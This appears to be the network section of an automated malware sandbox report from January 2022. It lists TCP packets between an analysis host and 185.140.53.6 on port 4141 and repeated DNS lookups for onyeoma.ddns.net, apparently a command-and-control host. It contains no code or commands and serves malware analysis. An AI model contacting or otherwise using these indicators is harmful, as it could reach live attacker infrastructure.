Jan 24, 2022 02:26:17.987550020 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.987665892 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.987723112 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.987823009 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.987871885 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.987895966 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.988025904 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.988152027 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.988200903 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.988322973 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.988465071 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.988514900 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.988537073 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.988583088 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.988677979 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.988822937 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.989156961 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.989209890 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.989264965 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.989312887 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.989386082 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.989583015 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.989703894 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.989784956 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.989908934 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.989948988 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.989978075 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.990051031 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.990112066 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.990120888 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.990271091 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.990394115 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.990463018 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.990533113 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:17.990586996 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:17.990684032 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.020597935 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.020745993 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.022080898 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.024266958 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.024456978 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.024518967 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.025166988 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.025224924 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.025716066 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.025904894 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.026160002 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.026211977 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.045288086 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.045348883 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.045386076 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.045434952 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.045460939 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.045483112 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.045586109 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.045640945 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.045670033 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.045842886 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.045974970 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.046017885 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.046041012 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.046072006 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.046114922 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.060725927 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.060786009 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.060885906 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.072381973 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.072477102 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.090262890 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.090323925 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.090365887 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.090403080 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.090445042 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.090497017 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.090553045 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.090656996 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.090715885 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.090943098 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.090982914 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.091022015 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.091079950 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.091201067 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.091243029 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.091263056 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.091456890 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.091547966 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.091732979 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.091753006 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.091804028 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.091821909 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.091993093 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.092075109 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.092114925 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.094161034 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.094338894 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.094433069 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.094499111 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.094559908 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.094713926 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.094755888 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.094847918 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.094914913 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.095057964 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.095098019 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.095123053 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.095798016 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.096075058 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.096097946 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.096344948 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.096407890 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.096501112 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.096565008 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.096648932 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.096712112 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.096743107 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.096801043 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.096863031 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.097016096 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.097091913 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.097155094 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.097248077 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.097373962 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.097419024 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.097563028 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.097634077 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.097683907 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.143090010 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.143152952 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.143224001 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.143263102 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.143330097 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.144896030 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.145143986 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.145209074 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.145246983 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.145279884 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.145380974 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.145390034 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.145452023 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.145545006 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.145674944 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.145773888 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.145946026 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.145996094 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.146042109 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.146090031 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.146117926 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.146292925 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.146321058 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.149719000 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.149763107 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.149801016 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.149816036 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.149863958 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.153016090 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.153064013 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.153131008 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.153321981 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.153362989 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.153400898 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.153455019 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.153759003 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.154090881 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.156002045 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.158258915 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.158329010 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.160876036 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.162806034 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.162895918 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.165004015 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.167332888 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.167424917 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.169574022 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.169717073 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.171817064 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.171910048 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.182816982 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.182945013 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.184248924 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.184344053 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.205626965 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.206738949 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.206780910 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.206845999 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.206892014 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.206940889 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.206984997 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.207144976 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.207204103 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.207274914 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.207302094 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.207343102 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.207381010 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.207437992 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.207530975 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.207581997 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.207652092 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.207707882 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.207720995 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.207770109 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.207931042 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.207984924 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.208058119 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.208147049 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.208178043 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.208226919 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.210367918 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.210458040 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.212559938 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.212711096 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.214907885 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.214967012 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.217228889 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.219465017 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.219532013 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.302170992 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.303973913 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.322979927 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.323043108 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.323060989 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.323096991 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.408653021 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.408726931 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.408751965 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.408814907 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.806741953 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.848963022 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:18.955144882 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.955214977 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:18.955285072 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:19.048304081 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.048371077 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.048412085 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.048435926 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:19.048449039 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.048531055 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:19.220488071 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.220556021 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.220593929 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.220628977 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.220659971 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:19.220700979 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:19.373760939 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:19.675708055 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.690229893 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.703892946 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:19.782453060 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.786777973 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:19.905107021 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.905241013 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:19.999212027 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:19.999321938 CET	49833	4141	192.168.2.4	185.140.53.6
Jan 24, 2022 02:26:20.301218033 CET	4141	49833	185.140.53.6	192.168.2.4
Jan 24, 2022 02:26:20.301369905 CET	49833	4141	192.168.2.4	185.140.53.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 24, 2022 02:24:20.130364895 CET	59123	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:24:20.152194977 CET	53	59123	8.8.8.8	192.168.2.4
Jan 24, 2022 02:24:26.604687929 CET	54531	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:24:26.623925924 CET	53	54531	8.8.8.8	192.168.2.4
Jan 24, 2022 02:24:31.216694117 CET	49714	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:24:31.236319065 CET	53	49714	8.8.8.8	192.168.2.4
Jan 24, 2022 02:24:37.260209084 CET	58028	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:24:37.283354044 CET	53	58028	8.8.8.8	192.168.2.4
Jan 24, 2022 02:24:43.306494951 CET	53097	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:24:43.325751066 CET	53	53097	8.8.8.8	192.168.2.4
Jan 24, 2022 02:24:50.347665071 CET	62389	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:24:50.367348909 CET	53	62389	8.8.8.8	192.168.2.4
Jan 24, 2022 02:24:56.356394053 CET	49910	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:24:56.376116037 CET	53	49910	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:02.409034967 CET	55854	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:02.430704117 CET	53	55854	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:08.887145996 CET	64549	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:08.907834053 CET	53	64549	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:14.852178097 CET	63153	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:14.871570110 CET	53	63153	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:20.936527014 CET	52991	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:20.955882072 CET	53	52991	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:27.008050919 CET	51726	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:27.027782917 CET	53	51726	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:33.414751053 CET	56534	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:33.435841084 CET	53	56534	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:39.569437981 CET	56627	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:39.586961031 CET	53	56627	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:45.674490929 CET	56621	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:45.694015980 CET	53	56621	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:51.681771994 CET	63116	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:51.704018116 CET	53	63116	8.8.8.8	192.168.2.4
Jan 24, 2022 02:25:57.978744984 CET	55046	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:25:57.998338938 CET	53	55046	8.8.8.8	192.168.2.4
Jan 24, 2022 02:26:04.045773983 CET	50601	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:26:04.066617966 CET	53	50601	8.8.8.8	192.168.2.4
Jan 24, 2022 02:26:10.198947906 CET	60875	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:26:10.220319033 CET	53	60875	8.8.8.8	192.168.2.4
Jan 24, 2022 02:26:16.618215084 CET	56448	53	192.168.2.4	8.8.8.8
Jan 24, 2022 02:26:16.639257908 CET	53	56448	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 24, 2022 02:24:20.130364895 CET	192.168.2.4	8.8.8.8	0xf62e	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:26.604687929 CET	192.168.2.4	8.8.8.8	0xcfe8	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:31.216694117 CET	192.168.2.4	8.8.8.8	0xbee8	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:37.260209084 CET	192.168.2.4	8.8.8.8	0x8d19	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:43.306494951 CET	192.168.2.4	8.8.8.8	0xd83c	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:50.347665071 CET	192.168.2.4	8.8.8.8	0x3947	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:24:56.356394053 CET	192.168.2.4	8.8.8.8	0xd465	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:02.409034967 CET	192.168.2.4	8.8.8.8	0x9325	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:08.887145996 CET	192.168.2.4	8.8.8.8	0xc690	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:14.852178097 CET	192.168.2.4	8.8.8.8	0xd813	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:20.936527014 CET	192.168.2.4	8.8.8.8	0xa7ba	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:27.008050919 CET	192.168.2.4	8.8.8.8	0x6dd9	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:33.414751053 CET	192.168.2.4	8.8.8.8	0xd584	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:39.569437981 CET	192.168.2.4	8.8.8.8	0x3bc	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:45.674490929 CET	192.168.2.4	8.8.8.8	0x5c16	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:51.681771994 CET	192.168.2.4	8.8.8.8	0xe7ef	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:25:57.978744984 CET	192.168.2.4	8.8.8.8	0xf5f7	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:26:04.045773983 CET	192.168.2.4	8.8.8.8	0x588d	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:26:10.198947906 CET	192.168.2.4	8.8.8.8	0x7508	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)
Jan 24, 2022 02:26:16.618215084 CET	192.168.2.4	8.8.8.8	0x1c3a	Standard query (0)	onyeoma.ddns.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
